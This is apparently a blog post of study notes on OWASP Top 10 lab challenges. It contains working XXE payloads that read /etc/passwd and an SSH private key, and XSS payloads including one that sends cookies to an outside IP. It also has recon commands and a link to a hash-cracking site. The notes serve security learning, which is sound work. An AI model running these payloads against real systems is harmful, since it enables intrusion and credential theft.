Certified Ethical Hacker: Useful Links and Summary
2 min readApr 6, 2021
Useful Tools
- Cracking hash: https://crackstation.net/
OWASP Top 10
Severity 1: OS Command Injection
Folders:<user directory>/.ssh/id_rsa - Where private key is stored
/etc/passwd - Store users information
/etc/os-release - Store OS informationCommands:pwd - To show the current working directory
whoami - To show the current user
cat /etc/passwd | grep "www-data" - Only grab output with "www-data"
grep -r "MOTD" /etc - Search for all files that match "MOTD" under /etc directory
Severity 2: Broken Authentication
Severity 3: Sensitive Data Exposure
- Locate hidden directories on the website by using the Target feature in Burp Suite.
- Retrieve sensitive information from the database.
root@ip-10-10-255-70:~# file webapp.db >>> To check the filetype
root@ip-10-10-255-70:~# sqlite3 webapp.db >>> To access the database
sqlite> .tables >>> To see what tables are available
sqlite> pragma table_info(users); >>> To list the columns of a particular table
sqlite> select * from users; >>> To list all contents from a particular tableSeverity 4: XML External Entity
This challenge abuses XML vulnerability through the use of ENTITY:
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
<root>&read;</root><?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:/home/falcon/.ssh/id_rsa'>]>
<root>&read;</root>
Severity 5: Broken Access Control
This challenge exploits Insecure Direct Object Reference (IDOR), which is an act of exploiting misconfiguration in the way user input is handled.
How?
- Change the URL’s variable manually OR
- Use the Intruder feature in Burp Suite.
- This challenge addresses the leakage of sensitive data on public database like GitHub.
XSS is a vulnerability commonly found in web application that allows an attacker to execute malicious scripts and have it executed from the user’s machine due to improper sanitization.
There are different types of XSS vulnerabilities:
- Stored XSS — This can often be exploited by injecting malicious script into the web application database or comments section.
- Reflected XSS — The malicious payload is part of the victims request to the website. The attacker would need to trick a victim into clicking the malicious URL.
- DOM XSS — For DOM XSS, an attacker’s payload will only be executed until the website’s legitimate JavaScript code is executed.
<a href=”www.google.com”> Click on this link </a><script>alert(document.cookie)</script><script>alert(window.location.hostname)</script><script>document.querySelector('#thm-title').textContent='I am a hacker'</script><script>document.location='http://10.10.88.170/log'+document.cookie</script><img src="x" onerror="alert('HHelloello')">
